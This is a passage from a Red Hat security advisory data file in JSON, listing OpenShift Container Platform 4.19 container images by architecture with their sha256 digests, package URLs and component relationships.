"purl": "pkg:oci/openshift/ose-openshift-apiserver-rhel9@sha256%3A35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775572127"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openshift-controller-manager-rhel9@sha256%3A5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564516"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9@sha256%3Adbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606187"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cinder-csi-driver-rhel9-operator@sha256%3A6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606809"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product_id": "registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-openstack-cloud-controller-manager-rhel9@sha256%3Ad17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564624"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product_id": "registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-operator-framework-tools-rhel9@sha256%3A92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775605528"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product_id": "registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ovirt-csi-driver-rhel9@sha256%3Adbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606167"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-rhel9@sha256%3A515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577363"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product": {
"name": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product_id": "registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/openshift-route-controller-manager-rhel9@sha256%3Aceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775565065"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product_id": "registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-service-ca-rhel9-operator@sha256%3A81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product_id": "registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-tools-rhel9@sha256%3Aff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775564250"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product_id": "registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-ovn-kubernetes-microshift-rhel9@sha256%3A8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775577164"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prom-label-proxy-rhel9@sha256%3A7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606843"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-config-reloader-rhel9@sha256%3Ae4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604108"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-rhel9-operator@sha256%3A6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606131"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product_id": "registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-prometheus-operator-admission-webhook-rhel9@sha256%3A53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606725"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product_id": "registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-telemeter-rhel9@sha256%3A37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775604846"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product": {
"name": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product_id": "registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"product_identification_helper": {
"purl": "pkg:oci/openshift/ose-thanos-rhel9@sha256%3A5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717?arch=s390x\u0026repository_url=registry.redhat.io/openshift4\u0026tag=1775606385"
}
}
}
],
"category": "architecture",
"name": "s390x"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64"
},
"product_reference": "registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x as a component of Red Hat OpenShift Container Platform 4.19",
"product_id": "Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x"
},
"product_reference": "registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"relates_to_product_reference": "Red Hat OpenShift Container Platform 4.19"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64 as a component of Red Hat OpenShift Container Platform 4.19",
